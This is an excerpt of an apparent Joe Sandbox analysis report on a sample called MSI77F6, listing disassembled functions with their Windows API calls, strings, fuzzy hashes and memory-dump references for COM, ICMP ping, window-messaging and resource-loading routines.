                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                        • String ID:
                                        • API String ID: 2706829360-0
                                        • Opcode ID: 603751e2736174689310a24324706cb680e455ae01b0283ca39b962f218b23d9
                                        • Instruction ID: d12ba0bf6944f914d9fa18935d05d1ffa0c2655e5f624cd8af7ca3f79e4ddaf5
                                        • Opcode Fuzzy Hash: 603751e2736174689310a24324706cb680e455ae01b0283ca39b962f218b23d9
                                        • Instruction Fuzzy Hash: 84412D31900219EFCF11EFA4D8889EEBBB9FF49354F108065F911A3251DB38AA45CBA5
                                        Function 007CB250 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 007784A6: __swprintf.LIBCMT ref: 007784E5
                                          • Part of subcall function 007784A6: __itow.LIBCMT ref: 00778519
                                        • CoInitialize.OLE32 ref: 007CB298
                                        • CoUninitialize.COMBASE ref: 007CB2A3
                                        • CoCreateInstance.COMBASE(?,00000000,00000017,007FD8FC,?), ref: 007CB303
                                        • IIDFromString.COMBASE(?,?), ref: 007CB376
                                        • VariantInit.OLEAUT32(?), ref: 007CB410
                                        • VariantClear.OLEAUT32(?), ref: 007CB471
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                        • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                        • API String ID: 834269672-1287834457
                                        • Opcode ID: 6c807b4de5e6b8237b07f2021863042f1b0286bac8c949f6545b6a8939aaedb5
                                        • Instruction ID: 7fefcba633a5172b7c976cc5b465f8731783b2e050c51fe2e1e4f5c97fd84960
                                        • Opcode Fuzzy Hash: 6c807b4de5e6b8237b07f2021863042f1b0286bac8c949f6545b6a8939aaedb5
                                        • Instruction Fuzzy Hash: 4E617771208651AFC710DF64C88AF6AB7E8EF88754F00481DF9859B291D778EE48CB92
                                        Function 007C8694 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • WSAStartup.WS2_32(00000101,?), ref: 007C86F5
                                        • inet_addr.WS2_32(?), ref: 007C873A
                                        • gethostbyname.WS2_32(?), ref: 007C8746
                                        • IcmpCreateFile.IPHLPAPI ref: 007C8754
                                        • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 007C87C4
                                        • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 007C87DA
                                        • IcmpCloseHandle.IPHLPAPI(00000000), ref: 007C884F
                                        • WSACleanup.WS2_32 ref: 007C8855
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                        • String ID: Ping
                                        • API String ID: 1028309954-2246546115
                                        • Opcode ID: 911eac55659b6c04f34a3ee14852ced6251e68404fbf36eeadd7fc071e221d3b
                                        • Instruction ID: 21efb13f8ee2f87a7b41555302082cc2b638b20635f0f9a22c5dd3f259089978
                                        • Opcode Fuzzy Hash: 911eac55659b6c04f34a3ee14852ced6251e68404fbf36eeadd7fc071e221d3b
                                        • Instruction Fuzzy Hash: 47517131604201EFDB60EF64CC49F6A7BE5AF48720F14852EF5559B2A1DB78EC01CB52
                                        Function 007BEC11 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 97COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetErrorMode.KERNEL32(00000001), ref: 007BEC1E
                                        • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 007BEC94
                                        • GetLastError.KERNEL32 ref: 007BEC9E
                                        • SetErrorMode.KERNEL32(00000000,READY), ref: 007BED0B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Error$Mode$DiskFreeLastSpace
                                        • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                        • API String ID: 4194297153-14809454
                                        • Opcode ID: f1617de3795d917c88b7f93f5f03ebe54cbfcf3aaba5bc95541763d966667de0
                                        • Instruction ID: c42a8686b6b36847dd28f00c5a891ae122cfc2c2f2a36dd3b5014799585f78b4
                                        • Opcode Fuzzy Hash: f1617de3795d917c88b7f93f5f03ebe54cbfcf3aaba5bc95541763d966667de0
                                        • Instruction Fuzzy Hash: 6231A135A00209EFCB11EB64C949BEEBBB5FF44750F148025E505D7391DA7D9D81CBA1
                                        Function 007AC6FD Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0077CAEE: _memmove.LIBCMT ref: 0077CB2F
                                        • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 007AC782
                                        • GetDlgCtrlID.USER32 ref: 007AC78D
                                        • GetParent.USER32 ref: 007AC7A9
                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 007AC7AC
                                        • GetDlgCtrlID.USER32(?), ref: 007AC7B5
                                        • GetParent.USER32(?), ref: 007AC7D1
                                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 007AC7D4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: MessageSend$CtrlParent$_memmove
                                        • String ID: ComboBox$ListBox
                                        • API String ID: 313823418-1403004172
                                        • Opcode ID: f3b580f740c8bc758ede2ab1addccd0f97ec703e7d7aa02de7a4cad25e918a4d
                                        • Instruction ID: 75413d67dd6332bf759530dde3367e218f88b980f8715f0aa56dd7a1398df510
                                        • Opcode Fuzzy Hash: f3b580f740c8bc758ede2ab1addccd0f97ec703e7d7aa02de7a4cad25e918a4d
                                        • Instruction Fuzzy Hash: 7D219074900208FBDF06ABA4CC86EBEB775EB86350F108215F566D72D1DB7C5855EB20
                                        Function 007AC7E6 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 80windowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0077CAEE: _memmove.LIBCMT ref: 0077CB2F
                                        • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 007AC869
                                        • GetDlgCtrlID.USER32 ref: 007AC874
                                        • GetParent.USER32 ref: 007AC890
                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 007AC893
                                        • GetDlgCtrlID.USER32(?), ref: 007AC89C
                                        • GetParent.USER32(?), ref: 007AC8B8
                                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 007AC8BB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: MessageSend$CtrlParent$_memmove
                                        • String ID: ComboBox$ListBox
                                        • API String ID: 313823418-1403004172
                                        • Opcode ID: ef2b2cf830e4944346efc6e2bccb0178373bca2065084d0e987e3513edc04c19
                                        • Instruction ID: ac6debc705ef8e9e57fb15f46878fbea7373b4fe7b4ec5a1b7af98aaa0586356
                                        • Opcode Fuzzy Hash: ef2b2cf830e4944346efc6e2bccb0178373bca2065084d0e987e3513edc04c19
                                        • Instruction Fuzzy Hash: A321A171900208FBDF01ABA4CC85EBEB775EF46341F108115F552E7191DB7C5855DB20
                                        Function 007AC8CD Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 71windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetParent.USER32 ref: 007AC8D9
                                        • GetClassNameW.USER32(00000000,?,00000100), ref: 007AC8EE
                                        • _wcscmp.LIBCMT ref: 007AC900
                                        • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 007AC97B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: ClassMessageNameParentSend_wcscmp
                                        • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                        • API String ID: 1704125052-3381328864
                                        • Opcode ID: 3bae786027c5acc46b1efeeb70a9fd8c237d5be634860523c27b69d7389f60d6
                                        • Instruction ID: e6222f134e8a7cf1afffdf2c188271d6d3be1c34b24f6b5fe05f1219d69306c7
                                        • Opcode Fuzzy Hash: 3bae786027c5acc46b1efeeb70a9fd8c237d5be634860523c27b69d7389f60d6
                                        • Instruction Fuzzy Hash: 1911A3B7648313F9FE162A24AC0BCA767ADEB47760B200212F910E90D2FB6D79518554
                                        Function 007BB05A Relevance: 15.3, APIs: 10, Instructions: 317COMMON
                                        Download Yara Rule
                                        APIs
                                        • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 007BB137
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: ArraySafeVartype
                                        • String ID:
                                        • API String ID: 1725837607-0
                                        • Opcode ID: 17a69821e85f569c6dd00ec0c8e6cded891239a97ef6152c09807e06c8a84e33
                                        • Instruction ID: ceca9ec78f4b576dc60edbd8c49048f743269be6a95ca2274cf69e1692693f10
                                        • Opcode Fuzzy Hash: 17a69821e85f569c6dd00ec0c8e6cded891239a97ef6152c09807e06c8a84e33
                                        • Instruction Fuzzy Hash: 9CC14975A0021ADFDB04DF98D485BEEB7F4FF08325F20406AEA16E7251C7B9A941CB90
                                        Function 0079BA66 Relevance: 15.2, APIs: 10, Instructions: 219COMMON
                                        Download Yara Rule
                                        APIs
                                        • __lock.LIBCMT ref: 0079BA74
                                          • Part of subcall function 00798984: __mtinitlocknum.LIBCMT ref: 00798996
                                          • Part of subcall function 00798984: RtlEnterCriticalSection.NTDLL(00790127), ref: 007989AF
                                        • __calloc_crt.LIBCMT ref: 0079BA85
                                          • Part of subcall function 00797616: __calloc_impl.LIBCMT ref: 00797625
                                          • Part of subcall function 00797616: Sleep.KERNEL32(00000000,?,00790127,?,0077125D,00000058,?,?), ref: 0079763C
                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 0079BAA0
                                        • GetStartupInfoW.KERNEL32(?,00826990,00000064,00796B14,008267D8,00000014), ref: 0079BAF9
                                        • __calloc_crt.LIBCMT ref: 0079BB44
                                        • GetFileType.KERNEL32(00000001), ref: 0079BB8B
                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 0079BBC4
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                        • String ID:
                                        • API String ID: 1426640281-0
                                        • Opcode ID: 5279e79f1e3b6fa51c55e37f286edd6ac813fe12ba1254f152ea6bdca39f4794
                                        • Instruction ID: 5fd3d2a22aa62e55dbd6824df419c197ec8b765471b3d31534f023523e2983e2
                                        • Opcode Fuzzy Hash: 5279e79f1e3b6fa51c55e37f286edd6ac813fe12ba1254f152ea6bdca39f4794
                                        • Instruction Fuzzy Hash: 2C81D470905745CFCF14CF68F9846A9BBB0BF4A324B24865DD466AB3D1D7389802CB64
                                        Function 007B7212 Relevance: 15.1, APIs: 10, Instructions: 107windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • __swprintf.LIBCMT ref: 007B7226
                                        • __swprintf.LIBCMT ref: 007B7233
                                          • Part of subcall function 0079234B: __woutput_l.LIBCMT ref: 007923A4
                                        • FindResourceW.KERNEL32(?,?,0000000E), ref: 007B725D
                                        • LoadResource.KERNEL32(?,00000000), ref: 007B7269
                                        • LockResource.KERNEL32(00000000), ref: 007B7276
                                        • FindResourceW.KERNEL32(?,?,00000003), ref: 007B7296
                                        • LoadResource.KERNEL32(?,00000000), ref: 007B72A8
                                        • SizeofResource.KERNEL32(?,00000000), ref: 007B72B7
                                        • LockResource.KERNEL32(?), ref: 007B72C3
                                        • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 007B7322
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                        • String ID:
                                        • API String ID: 1433390588-0
                                        • Opcode ID: 2c6ff5ab7eebd5c51f1b3f0bbb3a6bb06703ed09eec5100cfde812dde67a2bba
                                        • Instruction ID: b5e78b9f8508344097f74aa2a1b108b3fcb310a4502d7543b73b222b13fd5b72
                                        • Opcode Fuzzy Hash: 2c6ff5ab7eebd5c51f1b3f0bbb3a6bb06703ed09eec5100cfde812dde67a2bba
                                        • Instruction Fuzzy Hash: B831ABB190425AABDF159F60AC89BFF7BA9FF88301F008425F902E2151E738D950DAA4
                                        Function 007EEC19 Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetClientRect.USER32(?), ref: 007EEC32
                                        • SendMessageW.USER32(?,00001328,00000000,?), ref: 007EEC49
                                        • GetWindowDC.USER32(?), ref: 007EEC55
                                        • GetPixel.GDI32(00000000,?,?), ref: 007EEC64
                                        • ReleaseDC.USER32(?,00000000), ref: 007EEC76
                                        • GetSysColor.USER32(00000005), ref: 007EEC94
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                        • String ID:
                                        • API String ID: 272304278-0
                                        • Opcode ID: bea27a41d84c9a5867a97079a418b45828d2f81b5c8acc39eb63be22e7633899
                                        • Instruction ID: 4a3a0dea506f3bedb192e2b1435f7b711529c809279b1b749cda56fdd976492c
                                        • Opcode Fuzzy Hash: bea27a41d84c9a5867a97079a418b45828d2f81b5c8acc39eb63be22e7633899
                                        • Instruction Fuzzy Hash: 50215E31540645EFDB21AB64EC48BB97B76EB09321F208520FA26A50F1DB390D51DF21
                                        Function 007AD978 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 239COMMON
                                        Download Yara Rule
                                        APIs
                                        • EnumChildWindows.USER32(?,007ADD46), ref: 007ADC86
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: ChildEnumWindows
                                        • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                        • API String ID: 3555792229-1603158881
                                        • Opcode ID: 9edb2fbe0aa5d5bdd6a40be81fcd4b669a5afedca7b4125d1ce655bb95e9a77e
                                        • Instruction ID: aed80eb2b5311a081fc7198ceb2b4edbe11a118da7c7fb191f2795c1ebd46f08
                                        • Opcode Fuzzy Hash: 9edb2fbe0aa5d5bdd6a40be81fcd4b669a5afedca7b4125d1ce655bb95e9a77e
                                        • Instruction Fuzzy Hash: 2A91D470600506EACB18EF60C485BEDFB75FF4A350F548219D85BA7551DF38AD8ACBA0
                                        Function 007745A7 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 211COMMON
                                        Download Yara Rule
                                        APIs
                                        • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 007745F0
                                        • CoUninitialize.COMBASE ref: 00774695
                                        • UnregisterHotKey.USER32(?), ref: 007747BD
                                        • DestroyWindow.USER32(?), ref: 007E5936
                                        • FreeLibrary.KERNEL32(?), ref: 007E599D
                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 007E59CA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                        • String ID: close all
                                        • API String ID: 469580280-3243417748
                                        • Opcode ID: a692dbb450c3d2b6414615b989b4093b3d2257b0cedb8005aeaf594f648c7367
                                        • Instruction ID: 498b2f982008e9573e87b74640c2f75b133c29dd875dd59c65b423d918f978d8
                                        • Opcode Fuzzy Hash: a692dbb450c3d2b6414615b989b4093b3d2257b0cedb8005aeaf594f648c7367
                                        • Instruction Fuzzy Hash: 12912E34601606CFCB19EF14C899B68F3A4FF19744F5082A9E41E97262DB38AD66CF54
                                        Function 0078C24A Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 185windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SetWindowLongW.USER32(?,000000EB), ref: 0078C2D2
                                          • Part of subcall function 0078C697: GetClientRect.USER32(?,?), ref: 0078C6C0
                                          • Part of subcall function 0078C697: GetWindowRect.USER32(?,?), ref: 0078C701
                                          • Part of subcall function 0078C697: ScreenToClient.USER32(?,?), ref: 0078C729
                                        • GetDC.USER32 ref: 007EE006
                                        • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 007EE019
                                        • SelectObject.GDI32(00000000,00000000), ref: 007EE027
                                        • SelectObject.GDI32(00000000,00000000), ref: 007EE03C
                                        • ReleaseDC.USER32(?,00000000), ref: 007EE044
                                        • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 007EE0CF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                        • String ID: U
                                        • API String ID: 4009187628-3372436214
